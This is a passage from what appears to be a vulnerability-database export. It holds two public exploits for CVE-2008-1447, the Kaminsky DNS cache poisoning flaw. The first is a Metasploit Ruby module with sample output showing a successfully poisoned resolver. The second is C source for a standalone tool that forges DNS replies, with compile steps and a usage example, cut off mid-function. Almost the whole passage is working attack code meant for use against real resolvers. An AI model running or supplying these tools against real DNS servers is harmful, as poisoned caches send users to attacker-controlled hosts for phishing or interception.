ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(bailiwicked_host) > \r\n\r\nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary\r\n\r\n\tinclude Exploit::Remote::Ip\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'DNS BailiWicked Host Attack',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \r\n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single\r\n\t\t\t\tmalicious host entry into the target nameserver by sending random sub-domain\r\n\t\t\t\tqueries to the target DNS server coupled with spoofed replies to those\r\n\t\t\t\tqueries from the authoritative nameservers for the domain which contain a\r\n\t\t\t\tmalicious host entry for the hostname to be poisoned in the authority and\r\n\t\t\t\tadditional records sections. Eventually, a guessed ID will match and the\r\n\t\t\t\tspoofed packet will get accepted, and due to the additional hostname entry\r\n\t\t\t\tbeing within bailiwick constraints of the original request the malicious host\r\n\t\t\t\tentry will get cached.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'I)ruid', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 5585 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t["BIND", \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\r\n\t\t\t))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),\r\n\t\t\t\t\tOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),\r\n\t\t\t\t\tOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),\r\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\r\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\r\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),\r\n\t\t\t\t], self.class)\r\n\t\t\t\t\t\r\n\tend\r\n\t\r\n\tdef auxiliary_commands\r\n\t\treturn { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n\tend\r\n\r\n\tdef cmd_check(*args)\r\n\t\ttarg = args[0] || rhost()\r\n\t\tif(not (targ and targ.length > 0))\r\n\t\t\tprint_status("usage: check [dns-server]")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Using the Metasploit service to verify exploitability...")\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => targ,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\t\t\r\n\r\n\t\trandom = false\r\n\t\tports = []\r\n\t\tlport = nil\r\n\t\t\r\n\t\t1.upto(5) do |i|\r\n\t\t\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\r\n\t\t\t\t\t\tprint_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")\r\n\t\t\t\t\t\tt_port = t_port.to_i\r\n\t\t\t\t\t\tif(lport and lport != t_port)\r\n\t\t\t\t\t\t\trandom = true\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tlport = t_port\r\n\t\t\t\t\t\tports << t_port\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\t\t\r\n\t\tsrv_sock.close\r\n\t\t\r\n\t\tif(ports.length < 5)\r\n\t\t\tprint_status("UNKNOWN: This server did not reply to our vulnerability check requests")\r\n\t\t\treturn\r\n\t\tend\r\n\t\t\r\n\t\tif(random)\r\n\t\t\tprint_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")\r\n\t\t\tprint_status(" This server may still be exploitable, but not by this tool.")\r\n\t\telse\r\n\t\t\tprint_status("FAIL: This server uses static source ports and is vulnerable to poisoning")\r\n\t\tend\r\n\tend\r\n\t\t\r\n\tdef run\r\n\t\ttarget = rhost()\r\n\t\tsource = Rex::Socket.source_address(target)\r\n\t\tsport = datastore['SRCPORT']\r\n\t\thostname = datastore['HOSTNAME'] + '.'\r\n\t\taddress = datastore['NEWADDR']\r\n\t\trecons = datastore['RECONS']\r\n\t\txids = datastore['XIDS'].to_i\r\n\t\tttl = datastore['TTL'].to_i\r\n\t\txidbase = rand(4)+2*10000\r\n\r\n\t\tdomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0]\r\n\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => target,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\r\n\r\n\t\t# Get the source port via the metasploit service if it's not set\r\n\t\tif sport.to_i == 0\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\t\t\t\t\t\tsport = t_port.to_i\r\n\r\n\t\t\t\t\t\tprint_status("Switching to target port #{sport} based on Metasploit service")\r\n\t\t\t\t\t\tif target != t_addr\r\n\t\t\t\t\t\t\tprint_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Verify its not already cached\r\n\t\tbegin\r\n\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\tquery.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n\t\t\tquery.rd = 0\r\n\r\n\t\t\tbegin\r\n\t\t\t\tcached = false\r\n\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\tif((name.to_s + ".") == hostname and data.address.to_s == address)\r\n\t\t\t\t\t\t\tt = Time.now + ttl\r\n\t\t\t\t\t\t\tprint_status("Failure: This hostname is already in the target cache: #{name} == #{address}")\r\n\t\t\t\t\t\t\tprint_status(" Cache entry expires on #{t.to_s}... sleeping.")\r\n\t\t\t\t\t\t\tcached = true\r\n\t\t\t\t\t\t\tsleep ttl\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend until not cached\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\tend\r\n\r\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\r\n\r\n\t\tprint_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"\r\n\r\n\t\t# Look up the nameservers for the domain\r\n\t\tprint_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\r\n\t\t#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"\r\n\r\n\t\tbarbs = [] # storage for nameservers\r\n\t\tanswer0.answer.each do |rr0|\r\n\t\t\tprint_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n\t\t\tif rr0.type == 'NS'\r\n\t\t\t\tprint_status " Querying recon nameserver for address of #{rr0.nsdname}..."\r\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\r\n\t\t\t\t#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"\r\n\t\t\t\tanswer1.answer.each do |rr1|\r\n\t\t\t\t\tprint_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \r\n\t\t\t\t\tprint_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."\r\n\t\t\t\t\tanswer2 = res2.send(domain)\r\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\r\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n\t\t\t\t\t\tbarbs << nsrec\r\n\t\t\t\t\t\tprint_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\r\n\t\tif barbs.length == 0\r\n\t\t\tprint_status( "No DNS servers found.")\r\n\t\t\tsrv_sock.close\r\n\t\t\tdisconnect_ip\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\r\n\t\tqueries = 0\r\n\t\tresponses = 0\r\n\r\n\t\tconnect_ip if not ip_sock\r\n\r\n\t\tprint_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")\r\n\r\n\t\twhile true\r\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname\r\n\r\n\t\t\t# Send spoofed query\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\treq.id = rand(2**16)\r\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n\t\t\treq.rd = 1\r\n\r\n\t\t\tbuff = (\r\n\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\r\n\t\t\t\t\t:src => source,\r\n\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t:proto => 17\r\n\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\r\n\t\t\t\t\t:dport => 53\r\n\t\t\t\t)/req.encode\r\n\t\t\t).to_net\r\n\t\t\tip_sock.sendto(buff, target)\r\n\t\t\tqueries += 1\r\n\t\t\t\r\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n\t\t\treq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\r\n\t\t\treq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.qr = 1\r\n\t\t\treq.ra = 1\r\n\r\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\r\n\t\t\t\treq.id = id\r\n\t\t\t\tbarbs.each do |barb|\r\n\t\t\t\t\tbuff = (\r\n\t\t\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\r\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\r\n\t\t\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t\t\t:proto => 17\r\n\t\t\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t\t\t:sport => 53,\r\n\t\t\t\t\t\t\t:dport => sport.to_i\r\n\t\t\t\t\t\t)/req.encode\r\n\t\t\t\t\t).to_net\r\n\t\t\t\t\tip_sock.sendto(buff, target)\r\n\t\t\t\t\tresponses += 1\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\t# status update\r\n\t\t\tif queries % 1000 == 0\r\n\t\t\t\tprint_status("Sent #{queries} queries and #{responses} spoofed responses...")\r\n\t\t\tend\r\n\r\n\t\t\t# every so often, check and see if the target is poisoned...\r\n\t\t\tif queries % 250 == 0 \r\n\t\t\t\tbegin\r\n\t\t\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\t\t\tquery.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n\t\t\t\t\tquery.rd = 0\r\n\t\r\n\t\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\t\tif((name.to_s + ".") == hostname and data.address.to_s == address)\r\n\t\t\t\t\t\t\t\tprint_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")\r\n\t\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\t\tend\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\trescue ::Interrupt\r\n\t\t\t\t\traise $!\r\n\t\t\t\trescue ::Exception => e\r\n\t\t\t\t\tprint_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\nend\t\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9165"}, {"lastseen": "2017-11-19T21:39:40", "description": "No description provided by source.", "published": "2008-07-26T00:00:00", "type": "seebug", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9178", "id": "SSV:9178", "sourceData": "\n /*\r\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\r\n *\r\n * Compilation:\r\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\r\n *\r\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\r\n *\r\n * Author: marc.bevand at rapid7 dot com\r\n */\r\n\r\n#define _BSD_SOURCE\r\n\r\n#include <sys/types.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <math.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n#include <dumbnet.h>\r\n\r\n#define DNSF_RESPONSE (1<<15)\r\n#define DNSF_AUTHORITATIVE (1<<10)\r\n#define DNSF_REC_DESIRED (1<<8)\r\n#define DNSF_REC_AVAILABLE (1<<7)\r\n\r\n#define TYPE_A 0x1\r\n#define TYPE_NS 0x2\r\n#define CLASS_IN 0x1\r\n\r\nstruct dns_pkt\r\n{\r\n uint16_t txid;\r\n uint16_t flags;\r\n uint16_t nr_quest;\r\n uint16_t nr_ans;\r\n uint16_t nr_auth;\r\n uint16_t nr_add;\r\n} __attribute__ ((__packed__));\r\n\r\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\r\n{\r\n unsigned bufi, i, j;\r\n bufi = i = j = 0;\r\n while (name[i])\r\n {\r\n if (name[i] == '.')\r\n {\r\n if (bufi + 1 + (i - j) > size)\r\n fprintf(stderr, "format_domain overflow\\n"), exit(1);\r\n buf[bufi++] = i - j;\r\n memcpy(buf + bufi, name + j, i - j);\r\n bufi += i - j;\r\n j = i + 1;\r\n }\r\n i++;\r\n }\r\n if (bufi + 1 + 2 + 2 > size)\r\n fprintf(stderr, "format_domain overflow\\n"), exit(1);\r\n buf[bufi++] = 0;\r\n *len = bufi;\r\n}\r\n\r\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\r\n{\r\n uint16_t tmp;\r\n // name\r\n format_domain(buf, size, len, name);\r\n // type\r\n tmp = htons(type);\r\n memcpy(buf + *len, &tmp, sizeof (tmp));\r\n *len += sizeof (tmp);\r\n // class\r\n tmp = htons(class);\r\n memcpy(buf + *len, &tmp, sizeof (tmp));\r\n *len += sizeof (tmp);\r\n}\r\n\r\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\r\n{\r\n format_qr(buf, size, len, name, type, class);\r\n // ttl\r\n ttl = htonl(ttl);\r\n memcpy(buf + *len, &ttl, sizeof (ttl));\r\n *len += sizeof (ttl);\r\n // data length + data\r\n uint16_t dlen;\r\n struct addr addr;\r\n switch (type)\r\n {\r\n case TYPE_A:\r\n dlen = sizeof (addr.addr_ip);\r\n break;\r\n case TYPE_NS:\r\n dlen = strlen(data) + 1;\r\n break;\r\n default:\r\n fprintf(stderr, "format_rr: unknown type %02x", type);\r\n exit(1);\r\n }\r\n dlen = htons(dlen);\r\n memcpy(buf + *len, &dlen, sizeof (dlen));\r\n *len += sizeof (dlen);\r\n // data\r\n unsigned len2;\r\n switch (type)\r\n {\r\n case TYPE_A:\r\n if (addr_aton(data, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", data), exit(1);\r\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\r\n *len += sizeof (addr.addr_ip);\r\n break;\r\n case TYPE_NS:\r\n format_domain(buf + *len, size - *len, &len2, data);\r\n *len += len2;\r\n break;\r\n default:\r\n fprintf(stderr, "format_rr: unknown type %02x", type);\r\n exit(1);\r\n }\r\n}\r\n\r\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\r\n{\r\n u_char *out = buf;\r\n struct dns_pkt p = {\r\n .txid = htons(txid),\r\n .flags = htons(flags),\r\n .nr_quest = htons(1),\r\n .nr_ans = htons(0),\r\n .nr_auth = htons(0),\r\n .nr_add = htons(0),\r\n };\r\n u_char qr[256];\r\n unsigned l;\r\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\r\n if (sizeof (p) + l > size)\r\n fprintf(stderr, "dns_query overflow"), exit(1);\r\n memcpy(out, &p, sizeof (p));\r\n out += sizeof (p);\r\n memcpy(out, qr, l);\r\n out += l;\r\n *len = sizeof (p) + l;\r\n}\r\n\r\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\r\n uint16_t txid, uint16_t flags,\r\n const char *q_name, const char *q_ip,\r\n const char *domain, const char *auth_name, const char *auth_ip)\r\n{\r\n u_char *out = buf;\r\n u_char *end = buf + size;\r\n u_char rec[256];\r\n unsigned l_rec;\r\n uint32_t ttl = 24*3600;\r\n struct dns_pkt p = {\r\n .txid = htons(txid),\r\n .flags = htons(flags),\r\n .nr_quest = htons(1),\r\n .nr_ans = htons(1),\r\n .nr_auth = htons(1),\r\n .nr_add = htons(1),\r\n };\r\n (void)domain;\r\n *len = 0;\r\n if (out + *len + sizeof (p) > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\r\n // queries\r\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // answers\r\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\r\n ttl, q_ip);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // authoritative nameservers\r\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\r\n ttl, auth_name);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // additional records\r\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\r\n ttl, auth_ip);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n}\r\n\r\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\r\n{\r\n unsigned len = 0;\r\n // ip\r\n struct ip_hdr *ip = (struct ip_hdr *)buf;\r\n ip->ip_hl = 5;\r\n ip->ip_v = 4;\r\n ip->ip_tos = 0;\r\n ip->ip_id = rand() & 0xffff;\r\n ip->ip_off = 0;\r\n ip->ip_ttl = IP_TTL_MAX;\r\n ip->ip_p = 17; // udp\r\n ip->ip_sum = 0;\r\n struct addr addr;\r\n if (addr_aton(srcip, &addr) < 0)\r\n fprintf(stderr, "invalid source IP: %s", srcip), exit(1);\r\n ip->ip_src = addr.addr_ip;\r\n if (addr_aton(dstip, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", dstip), exit(1);\r\n ip->ip_dst = addr.addr_ip;\r\n // udp\r\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\r\n udp->uh_sport = htons(1234);\r\n udp->uh_dport = htons(53);\r\n // dns\r\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\r\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\r\n rand(), DNSF_REC_DESIRED, name);\r\n // udp len\r\n len += UDP_HDR_LEN;\r\n udp->uh_ulen = htons(len);\r\n // ip len & cksum\r\n len += IP_HDR_LEN;\r\n ip->ip_len = htons(len);\r\n ip_checksum(buf, len);\r\n return len;\r\n}\r\n\r\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\r\n uint16_t port_resolver, uint16_t txid,\r\n const char *q_name, const char *q_ip,\r\n const char *domain, const char *auth_name, const char *auth_ip)\r\n{\r\n unsigned len = 0;\r\n // ip\r\n struct ip_hdr *ip = (struct ip_hdr *)buf;\r\n ip->ip_hl = 5;\r\n ip->ip_v = 4;\r\n ip->ip_tos = 0;\r\n ip->ip_id = rand() & 0xffff;\r\n ip->ip_off = 0;\r\n ip->ip_ttl = IP_TTL_MAX;\r\n ip->ip_p = 17; // udp\r\n ip->ip_sum = 0;\r\n struct addr addr;\r\n if (addr_aton(srcip, &addr) < 0)\r\n fprintf(stderr, "invalid source IP: %s", srcip), exit(1);\r\n ip->ip_src = addr.addr_ip;\r\n if (addr_aton(dstip, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", dstip), exit(1);\r\n ip->ip_dst = addr.addr_ip;\r\n // udp\r\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\r\n udp->uh_sport = htons(53);\r\n udp->uh_dport = htons(port_resolver);\r\n // dns\r\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\r\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\r\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\r\n q_name, q_ip, domain, auth_name, auth_ip);\r\n // udp len\r\n len += UDP_HDR_LEN;\r\n udp->uh_ulen = htons(len);\r\n // ip len & cksum\r\n len += IP_HDR_LEN;\r\n ip->ip_len = htons(len);\r\n ip_checksum(buf, len);\r\n return len;\r\n}\r\n\r\nvoid usage(char *name)\r\n{\r\n fprintf(stderr, "Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> "\r\n "<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n"\r\n " <ip-querier> Source IP used when sending queries for random hostnames\\n"\r\n " (typically your IP)\\n"\r\n " <ip-resolver> Target DNS resolver to attack\\n"\r\n " <ip-authoritative> One of the authoritative DNS servers for <domain>\\n"\r\n " <port-resolver> Source port used by the resolver when forwarding queries\\n"\r\n " <subhost> Poison the cache with the A record <subhost>.<domain>\\n"\r\n " <domain> Domain name, see <subhost>.\\n"\r\n " <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n"\r\n " <attempts> Number of poisoning attemps, more attempts increase the\\n"\r\n " chance of successful poisoning, but also the attack time\\n"\r\n " <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n"\r\n " increase the chance of successful poisoning but, but also\\n"\r\n " the rate of packet loss\\n"\r\n "Example:\\n"\r\n " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n"\r\n "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n"\r\n "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n"\r\n "this example (8192 attempts and 16 replies/attempt) is 86%%\\n"\r\n "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n"\r\n "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n"\r\n "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n"\r\n "100 attempts/sec).\\n",\r\n name, name);\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n if (argc != 10)\r\n usage(argv[0]), exit(1);\r\n const char *querier = argv[1];\r\n const char *ip_resolver = argv[2];\r\n const char *ip_authoritative = argv[3];\r\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\r\n const char *subhost = argv[5];\r\n const char *domain = argv[6];\r\n const char *anyip = argv[7];\r\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\r\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\r\n if (domain[strlen(domain) - 1 ] != '.')\r\n fprintf(stderr, "domain must end with dot(.): %s\\n", domain), exit(1);\r\n printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\r\n srand(time(NULL));\r\n int unique = rand() + (rand() << 16);\r\n u_char buf[IP_LEN_MAX];\r\n unsigned len;\r\n char name[256];\r\n char ns[256];\r\n ip_t *iph;\r\n if ((iph = ip_open()) == NULL)\r\n err(1, "ip_open");\r\n int cnt = 0;\r\n while (cnt < attempts)\r\n {\r\n // send a query for a random hostname\r\n snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain);\r\n len = build_query(buf, querier, ip_resolver, name);\r\n if 